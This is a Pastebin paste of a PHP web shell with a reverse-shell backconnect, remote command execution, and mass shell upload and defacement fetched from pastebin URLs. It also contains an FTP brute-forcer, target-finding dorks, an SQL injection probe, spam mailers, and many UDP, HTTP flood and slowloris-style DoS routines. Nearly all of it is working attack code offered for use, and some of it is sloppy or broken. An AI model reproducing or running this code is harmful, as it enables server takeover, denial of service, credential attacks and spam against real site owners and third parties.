Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // -----------------------------------------------------------------------coded by Vasilisk-----------------------------------------------------------------------
- /*$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
- $_____________________$__________________________$
- $____________________$$$_________________________$
- $__$_________________$$$________________$________$
- $___$$______________$$$$$_____________$$_________$
- $____$$$____________$$$$$___________$$$__________$
- $_____$$$$$_________$$$$$________$$$$$___________$
- $______$$$$$$$______$$$$$_____$$$$$$$____________$
- $___________$$$$$____$$$___$$$$$_________________$
- $__$$$$$$$______$$$__$$$__$$$______$$$$$$$_______$
- $______$$$$$$$$____$$_$_$$____$$$$$$$$___________$
- $__________$$$$$$$$$_$$$_$$$$$$$$$_______________$
- $_________________$$$_$_$$$______________________$
- $_____________$$$$$___$___$$$$$__________________$
- $_____________________$__________________________$
- $_____________________$__________________________$
- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$*/
- // 'or 1=1 limit 1-- +
- // Приоретет: Ботнет
- // https://habrahabr.ru/post/249181/
- // http://pastebin.com/raw/qDsptDrB
- // https://www.youtube.com/watch?v=kyd9JdT0kio
- // https://habrahabr.ru/post/221871/
- // Приоритет: Спам
- // http://1337dayme.blogspot.ru/2015/02/revslider-mass-expl0iter-shell-upload.html
- // https://habrahabr.ru/post/313332/
- // https://www.youtube.com/watch?v=6wPdohKalQg
- // https://www.exploit-db.com/exploits/25444/
- // https://www.youtube.com/watch?v=dGnZnd2dUGA
- // http://dailyblackwork.blogspot.ru/2013/07/unix.html
- // https://www.hackzone.ru/articles/view/id/141/ уязвимости в php
- // http://pikabu.ru/story/poisk_uyazvimostey_posobie_dlya_chaynikov_2961936 HackBar http://proxy-base.com/f71/vzlom_saita_cherez_programmy-15909.html
- // https://forum.antichat.ru/threads/370648/ https://www.youtube.com/watch?v=9xLMtasP650
- ///index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
- // https://habrahabr.ru/company/kingservers/blog/324844/ https://freehacks.ru/showthread.php?t=429 http://www.williamspublishing.com/Books/5-8459-0785-3.html
- ini_set('display_errors', 'Off');
- session_start();
- function mysql1(){
- shape1();
- echo "[#] Mysql_host: ".mysql_get_host_info()."<br/>";
- echo "[#] MySql_server: ".mysql_get_server_info()."<br/>";
- echo "[#] Mysql_proto: ".mysql_get_proto_info()."<br/><br/>";
- print '<center><h2 style="color:#ff0000">MySql</h2></center>';
- print '<center><form method="POST">
- <input type="text" name="server" placeholder="Server"><br/>
- <input type="text" name="user" placeholder="User"><br/>
- <input type="text" name="mysql_pass" placeholder="Mysql_pass"><br/><br/>
- <input type="text" name="table" placeholder="Table"><br/>
- <input type="text" name="db" placeholder="DB"><br/></br>
- <input type="submit" name="Connect" value="Connect">
- </form><br/></center>';
- if(isset($_POST['Connect'])){
- $ms = mysql_connect($_POST['server'],$_GET['user'],$_POST['mysql_pass']);
- if(!$ms){
- echo "Error";
- }else{
- echo mysql_select_db($_POST['table'],$ms);
- echo mysql_drop_db($_POST['db']);
- echo mysql_list_dbs($ms);
- }
- mysql_close($ms);
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function cmdexec($cmd){
- if(function_exists('system'))@system($cmd);
- elseif(function_exists('passthru'))@passthru($cmd);
- elseif(function_exists('shell_exec'))@shell_exec($cmd);
- elseif(function_exists('exec'))@exec($cmd);
- elseif(function_exists('popen'))@popen($cmd,"r");
- }
- function info(){
- shape1();
- bingdork();
- print '<style>.b1 {background: Linen; color: DarkSlateGrey; font-size: 9pt; }</style>
- <center><form method="POST">
- <input type="submit" class="b1" name="mass_shell" value="Mass_shell_upload">
- <input type="submit" class="b1" name="deface_shell" value="Mass_shell_deface"><br/></form></center>';
- if(isset($_POST['mass_shell'])){echo up('http://pastebin.com/raw/90Beie2E','exploit.php');}
- if(isset($_POST['deface_shell'])){echo up('http://pastebin.com/raw/bRHGGFfj','deface.php');}
- $i = 'a';
- for($n=0; $n<25; $n++)
- {
- ++$i;
- if(scandir($i.":/")) echo "Disk: ".$i.":\<br>";
- }
- sysinfo();
- echo "[#] Server_ip: ".$_SERVER['SERVER_ADDR']."<br/>";
- echo "[#] Your_ip: ".$_SERVER['REMOTE_ADDR']."<br/>";
- echo "[#] Document_root: ".$_SERVER['DOCUMENT_ROOT']."<br/>";
- echo "[#] Server_admin: ".$_SERVER['SERVER_ADMIN']."<br/>";
- echo "[#] Server_soft: ".$_SERVER['SERVER_SOFTWARE']."<br/>";
- echo "[#] Server_port: ".$_SERVER['REMOTE_PORT']."<br/>";
- echo "[#] Host: ".$_SERVER['HTTP_HOST']."<br/>";
- echo "[#] PHP_Version: ".phpversion()."<br/>";
- echo "[#] Uname: ".php_uname()."<br/>";
- echo "[#] Mysql_client: ".mysql_get_client_info()."<br/>";
- echo "[#] Mysql_host: ".mysql_get_host_info()."<br/>";
- echo "[#] MySql_server: ".mysql_get_server_info()."<br/>";
- echo "[#] Mysql_proto: ".mysql_get_proto_info()."<br/><br/>";
- print '<style> a {text-decoration: none;} </style><body link="black" vlink="#808080" alink="#808080" bgcolor="#808080"><p><a alink="red" href="http://viewdns.info" target="_blank">[#] Reverse IP</a></p>';
- print '<form method="POST">
- <input type="text" name="pars" placeholder="site">
- <input type="submit" name="parsing" value="Parsing"><br/>';
- if (isset($_POST['parsing'])){echo file_get_contents($_POST['pars']);}
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function infophp(){ print'<javascript><a onclick="javascript:history.back(); return false;">Back to top</a>'; phpinfo();}
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function sysinfo(){
- echo '[#] '.$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "Safe Mode: ON<br/>" : "Safe Mode: OFF<br/>";
- echo '[#] '.$ds = @ini_get("disable_functions");
- echo $mysql = (function_exists('mysql_connect')) ? "MySql: ON<br/>" : "MySql: OFF<br/>";
- echo '[#] '.$curl = (function_exists('curl_version')) ? "CURL: ON<br/>" : "CURL: OFF<br/>";
- echo '[#] '.$wget = (exe('wget --help')) ? "Wget: ON<br/>" : "WGET: OFF<br/>";
- echo '[#] '.$perl = (exe('perl --help')) ? "Perl: ON<br/>" : "PERL: OFF<br/>";
- echo '[#] '.$python = (exe('python --help')) ? "Python: ON<br/>" : "Python: OFF<br/>";
- }
- // Thanks SinonX---
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- $info = 'p';
- } else {
- $info = 'u';
- }
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- // ---
- function backconnect(){
- ini_set('max_execution_time',0);
- if( isset($_POST['own']) && isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "" ) { echo "<p>The Program is now trying to connect!</p>";
- $ip = $_POST['ip'];
- $port=$_POST['port'];
- $sockfd=fsockopen($ip , $port , $errno, $errstr );
- if($errno != 0) { echo "<font color='red'><b>$errno</b> : $errstr</font>"; }
- else if (!$sockfd) { $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>"; }
- else { fputs ($sockfd , "\n=================================================================\n Back Connect in PHP\n \n=================================================================");
- $pwd = shell_exec("pwd");
- $sysinfo = shell_exec("uname -a");
- $id = shell_exec("id");
- $dateAndTime = shell_exec("time /t & date /T");
- $len = 1337;
- fputs($sockfd ,$sysinfo . "\n" );
- fputs($sockfd ,$pwd . "\n" );
- fputs($sockfd ,$id ."\n\n" );
- fputs($sockfd ,$dateAndTime."\n\n" );
- while(!feof($sockfd)) {
- $cmdPrompt ="(Shell)[$]> ";
- fputs ($sockfd , $cmdPrompt );
- $command= fgets($sockfd, $len);
- fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
- }
- fclose($sockfd);
- }
- } else {
- print'<center><font style="color:#ff0000"><form method="POST">
- IP: <input name="ip" value="'.$_SERVER['REMOTE_ADDR'].'"/>
- Port: <input name="port" value="31337" />
- <input style="width: 90px;" name="own" type="submit" value="Connect!"/></form></font></center>';
- }
- }
- function brute(){
- print '<body background="https://media0.giphy.com/media/lp3GUtG2waC88/giphy.gif"></body>';
- print '<!DOCTYPE html>
- <html><head><title></title></head><body><center><font color="red"><h1>DD0SHELL</h1></font></center>
- <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
- $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
- $user = $_GET['ftptest'];
- $host = $_GET['ip'];
- $passlist = file_get_contents('pass.txt');
- $port = 21;
- $timeout = 50;
- $passes = explode("\n", $passlist);
- $i = 1;
- foreach ($passes as $pass) {
- error_reporting(0);
- echo "[*] Testing " . $user . " && " . $pass . "\n";
- $con = ftp_connect($host, $port, $timeout);
- $login = ftp_login($con, $user, $pass);
- if (!$login) {
- ftp_close($con);
- $i++;
- } else {
- echo "Password:\n";
- echo "Made " . $i . " Attempts\n";
- echo "User: " . $user . " Password: " . $pass . "\n";
- break;
- }
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- // coded by Mr. Magnom
- function bingdork(){
- print'<style type="text/css"> textarea { width: 500px; height: 250px; border: 1px solid #000000; margin: 5px auto; padding: 7px; }
- input[type=text] { padding-left: 7px; width: 250px; height: 25px; border: 1px solid #000000; background: transparent; margin: 5px auto; }
- input[type=submit] { height: 25px; border: 1px solid #000000; background: transparent; margin: 5px auto; color: #000000; } </style> </head>
- <form method="post"> Bing Dork: <input type="text" name="dork" placeholder="dork" required> <input type="submit" name="go" value=">>"> </form>';
- function getsource($url, $proxy) {
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- if($proxy) {
- $proxy = explode(':', autoprox());
- curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
- curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
- }
- $content = curl_exec($curl);
- curl_close($curl);
- return $content;
- }
- $dork = htmlspecialchars($_POST['dork']);
- $do = urlencode($dork);
- if(isset($_POST['go'])) {
- $npage = 1;
- $npages = 30000;
- $allLinks = array();
- $lll = array();
- while($npage <= $npages) {
- $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
- if($x) {
- preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
- foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
- $npage = $npage + 10;
- if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
- } else break;
- }
- $URLs = array();
- foreach($allLinks as $url){
- $exp = explode("/", $url);
- $URLs[] = $exp[2];
- }
- $array = array_filter($URLs);
- $array = array_unique($array);
- $sss = count(array_unique($array));
- echo "ToTaL SiTe : $sss<br>";
- foreach($array as $domain) {
- echo "http://$domain/<br>";
- }
- }
- print '</html>';
- }
- // --
- // spamfox ---
- function generatemail($length = 19){
- $from = $_SERVER['HTTP_HOST'].'@mail.com';
- $email = 'abdefhiknrstyzABDEFGHKNQRSTYZ234567892001ISDNDLFJLSDOJFPAKASQGM';
- $numChars = strlen($email);
- $string = '';
- for ($i = 0; $i < $length; $i++) {
- $string .= substr($email, rand(1, $numChars) - 1, 1);
- }
- $string = $string.'@mail.com';
- echo $string;
- $message = $_GET['mess'];
- $headers = $_GET['head'];
- $subject = $_GET['subj'];
- if (mail($string,$subject,$message,$headers,'-f'.$from)) {echo "Yes!!!<br/>";}
- $string = $string.'@mail.ru';
- if (mail($string,$subject,$message,$headers,'-f'.$from)) {echo "<br/>";}
- else {
- $connect = fsockopen($server, 25, $errno, $errstr, 30);
- fputs($connect, "Hi\r\n");
- fputs($connect, "MAIL FROM: $from\n");
- fputs($connect, "RCPT TO: $to\n");
- fputs($connect, "DATA\r\n");
- fputs($connect, "Content-Type: text/plain; charset=iso-8859-1\n");
- fputs($connect, "To: $to\n");
- fputs($connect, "Subject: $subject\n");
- fputs($connect, "\n\n");
- fputs($connect, stripslashes($message)." \r\n");
- fputs($connect, ".\r\n");
- fputs($connect, "RSET\r\n");
- }
- }
- function spam1(){
- $message = $_GET['mess'];
- $headers = $_GET['head'];
- $subject = $_GET['subj'];
- $text = file_get_contents($_GET['base']);
- $f = fopen('w.txt', 'w');
- fwrite($f, $text);
- fclose($f);
- $text = fopen("w.txt", "r");
- $array = null;
- if ($text) {
- while (($buffer = fgets($text)) !== false) {
- $array[] = $buffer;
- }
- }
- fclose($text);
- foreach ($array as $key) {
- echo $key;
- mail($string,$subject,$message,$headers,'-f'.$from);
- }
- $server = $_GET['server'];
- $message = $_GET['mess'];
- $connect = fsockopen($server, 25, $errno, $errstr, 30);
- fputs($connect, "Hi\r\n");
- fputs($connect, "MAIL FROM: $from\n");
- fputs($connect, "RCPT TO: $to\n");
- fputs($connect, "DATA\r\n");
- fputs($connect, "Content-Type: text/plain; charset=iso-8859-1\n");
- fputs($connect, "To: $to\n");
- fputs($connect, "Subject: $subject\n");
- fputs($connect, "\n\n");
- fputs($connect, stripslashes($message)." \r\n");
- fputs($connect, ".\r\n");
- fputs($connect, "RSET\r\n");
- }
- function fox(){
- echo '<body background="https://temporarytattoos.com/pub/media/catalog/product/cache/image/700x560/e9c3970ab036de70892d86c6d221abfe/h/i/hipster-fox-temporary-tattoo-6222.jpg"></body>';
- print '<!DOCTYPE html>
- <html><head><title></title></head><body><center><h1>SPAMFOX</h1></center>
- <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
- $timei = time();
- $time = $_GET['time'];
- while (time() - $timei < $time) {
- echo generatemail(9);
- spam1();
- script();
- }
- }
- // ---
- function hash1(){
- shape1();
- print "<form method='POST'>
- MD5: <input type='text' name='md5_code'/>
- <input type='submit' name='code' value='MD5'/>
- Sha1: <input type='text name='Sha1' />
- <input type='submit' name='Sha1_code' value='Sha1' />";
- if(isset($_POST['code'])){
- echo "<p>MD5: ".md5($_POST['md5_code'])."</p>"."<br/>";
- }
- if(isset($_POST['Sha1_code'])){
- echo "<p>Sha1: ".sha1($_POST['Sha1'])."</p>"."<br/>";
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function sql_inj(){
- shape1();
- print "<center>SQL_INJECTON</center>"."<br/>";
- print'<center><form action="" method="POST">
- <input type="text" name="sql" placeholder="site">
- <input type="submit" value="Go "name="subm">
- </form></center>';
- if (isset($_POST['subm'])) {
- $dec = substr($_POST['sql'], -1);
- while ($dec < 12){
- $dec+=1;
- $url = new DOMDocument();
- $url->loadHTMLFile($_POST['sql'].$dec."'");
- $url->saveHTML();
- if (stristr($url->saveHTML(), 'You','have')) {
- echo "Yes";
- }elseif(stristr($url->saveHTML(), 'Sql','MySql')) {
- echo "Yes";
- }elseif (stristr($url->saveHTML(), ' ')) {
- echo "X?";
- }elseif (stristr($url->saveHTML(), 'mysql_fetch_array()')) {
- echo "X?";
- }else{
- echo "No";
- }
- }
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- function spam(){
- shape();
- print '<center><form method="POST">
- <textarea name="mess" placeholder="Message"></textarea><br/><br/>
- <input type="text" name="mailto" placeholder="mailto"><br/><br/>
- <input type="text" name="mailfrom" placeholder="mailfrom"><br/><br/>
- <input type="submit" name="mess1" value="Send">
- </form></center>'."<br/>";
- if (isset($_POST['mess1'])){
- $email = $_POST['mailto'];
- $from = $_POST['mailfrom'];
- $subject = 'Регистрация на сайте!';
- $subject = "=?utf-8?b?".base64_encode($subject)."?=";
- $headers = "Content-Type: text/plain; charset=\"utf-8\"\r\n";
- $headers .= "MIME-Version: 1.0\r\n";
- $headers .= "From: <".$from.">\r\n";
- $headers .= "Reply-To: ".$from."\r\n";
- $headers .= "Date: ". date('D, d M Y H:i:s O') ."\r\n";
- $message = $_POST['mess'];
- if (mail($email,$subject,$message,$headers,'-f'.$from)) {print'<h2><center><p><b><font color="red">Yes</center></h2>';}
- else {echo "No!!!";}
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- }
- // DDoS-----------------------------------------------------------------------------------------------------------------------------------------------------------
- function ddos(){
- shapeddos();
- if (isset($_GET['ip']) && isset($_GET['time'])){
- $pack = 0;
- $exec = $_GET['time'];
- $a = $_GET['ip'];
- $time = time();
- $max = $time+$exec;
- $host = $a;
- for($i=06555; $i <6555; $i++) {
- $mess .='x';
- }
- while (1) {
- $pack++;
- if(time() > $max){
- break;
- }
- $port = 53;
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- if($fp){
- fwrite($fp, $mess);
- fclose($fp);
- }
- }
- }else{
- $host = $_SERVER['SERVER_ADDR'];
- $pack = 0;
- $exec = 8;
- $time = time();
- $max = $time+$exec;
- echo $host;
- for($i=06555; $i <6555; $i++) {
- $mess .='x';
- }
- while (1) {
- $pack++;
- if(time() > $max){
- break;
- }
- $port = 53;
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- if($fp){
- fwrite($fp, $mess);
- fclose($fp);
- }
- }
- }
- script();
- }
- function ddos2(){
- shapeddos();
- $host = $_GET['ip'];
- $time = $_GET['time'];
- if(isset($_GET['ip']) && isset($_GET['time'])){
- $port = 80;
- $timei = time();
- $user_agent = rand(0, count($user_agents)-1);
- $packet = "GET $url HTTP/1.1\r\n";
- $packet .= "Host: $host\r\n";
- $packet .= "Keep-Alive: 900\r\n";
- $packet .= "Cache-Control: no-cache\r\n";
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
- $packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
- $packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
- $packet .= "Connection: keep-alive\r\n";
- $packet .= "User-Agent: $user_agent\r\n\r\n";
- while (time() - $timei < $time) {
- $handle = fsockopen($host, $port, $errno, $errstr, 1);
- fwrite($handle, $packet);
- }
- }else{
- $host = $_SERVER['SERVER_ADDR'];
- echo $host;
- $time = 8;
- $port = 80;
- $timei = time();
- $user_agent = rand(0, count($user_agents)-1);
- $packet = "GET $url HTTP/1.1\r\n";
- $packet .= "Host: $host\r\n";
- $packet .= "Keep-Alive: 900\r\n";
- $packet .= "Cache-Control: no-cache\r\n";
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
- $packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
- $packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
- $packet .= "Connection: keep-alive\r\n";
- $packet .= "User-Agent: $user_agent\r\n\r\n";
- while (time() - $timei < $time) {
- $handle = fsockopen($host, $port, $errno, $errstr, 1);
- fwrite($handle, $packet);
- }
- }
- script();
- }
- function ddos3(){
- shapeddos();
- $host = $_GET['ip']; // ipslow
- $port = 80;
- $time = $_GET['time'];
- $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
- $timei = time();
- $fs = array();
- while (time() - $timei < $time) {
- for ($i = 0; $i < 100; $i++){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- while (time() - $timei < $time) {
- for ($i = 0; $i < count($fs); $i++) {
- if (!$fs[$i]){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- fread($fs[$i], 1);
- }
- sleep(mt_rand(0.5, 2));
- }
- script();
- }
- }
- function ping($host, $port, $timeout){
- $tB = microtime(true);
- $fP = fSockOpen($host, $port, $errno, $errstr, $timeout);
- if (!$fP) { return "down"; }
- $tA = microtime(true);
- return round((($tA - $tB) * 1000), 0)." ms";
- }
- function ddos4(){
- shapeddos();
- $host = $_GET['ip']; //iping
- echo ping($host, 80, 10);
- cmdexec("ping -f $host");
- script();
- }
- function doSlow(){
- shapeddos();
- $timei = time();
- $host = $_GET['ip']; //dohost
- $time = $_GET['time'];
- $i = 0;
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- $out = "POST / HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
- $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
- $out .= "X-a: " . rand(1, 10000) . "\r\n";
- if (@fwrite($fs[$i], $out)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- script();
- }
- function ddos5(){
- shapeddos();
- $iii = $_GET['ip'];
- $ppp='80-53-443';
- $time = $_GET['time'];
- $timei = time();
- if(isset($_GET['ip'])){
- $ar_por=explode('-',$ppp);
- while (time() - $timei < $time) {
- foreach($ar_por as $por)
- {
- $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
- if ($fp)
- {
- stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
- @fclose($socket);
- }
- }
- }
- }else{
- $host = $_SERVER['SERVER_ADDR'];
- $time = 8;
- $timei = time();
- $pack = "";
- echo $host;
- for ($i=0; $i <6500 ; $i++) {
- $pack += "11212";
- }
- while (time() - $timei < $time) {
- $handle = fsockopen($host, $port, $errno, $errstr, 1);
- fwrite($handle, $pack);
- }
- }
- script();
- }
- function ddosintel(){
- $host = $_GET['ip'];
- $pps = 5000;
- $tune = 125;
- $uslp = (1000000 / $pps) - $tune;
- if($uslp < 0)
- $uslp = 0;
- for ($i=6500000; $i > 0 ; $i--) {
- $port = rand(1025, 65535);
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- fwrite($fp, $i);
- fclose($fp);
- usleep($uslp);
- }
- script();
- }
- function attack_http() {
- shape();
- $host = $_GET['host'];
- $server = $_GET['server'];
- $mthd = $_GET['mthd'];
- $port = 80;
- $time = 7;
- $timei = time();
- $fs = array();
- $request = "$mthd / HTTP/1.1\r\n";
- $request .= "Host: $host\r\n";
- $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
- $request .= "Keep-Alive: 900\r\n";
- $request .= "Accept: *.*\r\n";
- $timei = time();
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- if (@fwrite($fs[$i], $request)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- script();
- }
- // ddos post---------
- if($_POST['dos'] == 'tcp'){
- $iii = $_POST['ip'];
- $ppp='80-53-443';
- $time = $_POST['time'];
- $timei = time();
- if(isset($_POST['ip'])){
- $ar_por=explode('-',$ppp);
- while (time() - $timei < $time) {
- foreach($ar_por as $por)
- {
- $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
- if ($fp)
- {
- stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
- @fclose($socket);
- }
- }
- }
- }
- script();
- }
- $iii = $_POST['ip2'];
- $ppp='80-53-443';
- $time = $_POST['time2'];
- $timei = time();
- if(isset($_POST['ip2'])){
- $ar_por=explode('-',$ppp);
- while (time() - $timei < $time) {
- foreach($ar_por as $por)
- {
- $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
- if ($fp)
- {
- stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
- @fclose($socket);
- }
- }
- }
- script();
- }
- if($_POST['dos'] == 'd'){
- $timei = time();
- $host = $_POST['ip'];
- $time = $_POST['time'];
- $i = 0;
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- $out = "POST / HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
- $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
- $out .= "X-a: " . rand(1, 10000) . "\r\n";
- if (@fwrite($fs[$i], $out)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- script();
- }
- if(isset($_POST['dohost']) && isset($_POST['time'])){
- $timei = time();
- $host = $_POST['dohost'];
- $time = $_POST['time'];
- $i = 0;
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- for ($i = 0; $i < 100; $i++) {
- $out = "POST / HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
- $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
- $out .= "X-a: " . rand(1, 10000) . "\r\n";
- if (@fwrite($fs[$i], $out)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- script();
- }
- if($_POST['dos'] == 'udp'){
- $pack = 0;
- $host = $_POST['ip'];
- $exec = $_POST['time'];
- $time = time();
- $max = $time+$exec;
- for($i=06555; $i <6555; $i++) {
- $mess .='x';
- }
- while (1) {
- $pack++;
- if(time() > $max){
- break;
- }
- $port = 53;
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- if($fp){
- fwrite($fp, $mess);
- fclose($fp);
- }
- }
- script();
- }
- if(isset($_POST['ip1']) && isset($_POST['time1'])){
- $pack = 0;
- $host = $_POST['ip1'];
- $exec = $_POST['time1'];
- $time = time();
- $max = $time+$exec;
- for($i=06555; $i <6555; $i++) {
- $mess .='x';
- }
- while (1) {
- $pack++;
- if(time() > $max){
- break;
- }
- $port = 53;
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- if($fp){
- fwrite($fp, $mess);
- fclose($fp);
- }
- }
- script();
- }
- if(isset($_POST['server1'])){
- $server = $_POST['server1'];
- $host = $_POST['host1'];
- $request = "POST /".md5(rand())." HTTP/1.1\r\n";
- $request .= "Host: $host\r\n";
- $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
- $request .= "Keep-Alive: 900\r\n";
- $request .= "Content-Length: 1000000000\r\n";
- $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $request .= "Accept: *.*\r\n";
- $sockfd = @fsockopen($server, 80, $errno, $errstr);
- @fwrite($sockfd, $request);
- while (true){
- if (@fwrite($sockfd, ".") !== FALSE){
- echo ".";
- sleep(1);
- }else{
- $sockfd = @fsockopen($server, 80, $errno, $errstr);
- @fwrite($sockfd, $request);
- }
- }
- }
- if($_POST['dos'] == 'SlowRead'){
- $host = $_POST['ip'];
- $port = 80;
- $time = $_POST['time'];
- $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
- $timei = time();
- $fs = array();
- while (time() - $timei < $time) {
- for ($i = 0; $i < 100; $i++){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- while (time() - $timei < $time) {
- for ($i = 0; $i < count($fs); $i++) {
- if (!$fs[$i]){
- $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
- fwrite($fs[$i], $headers);
- }
- fread($fs[$i], 1);
- }
- sleep(mt_rand(0.5, 2));
- }
- script();
- }
- }
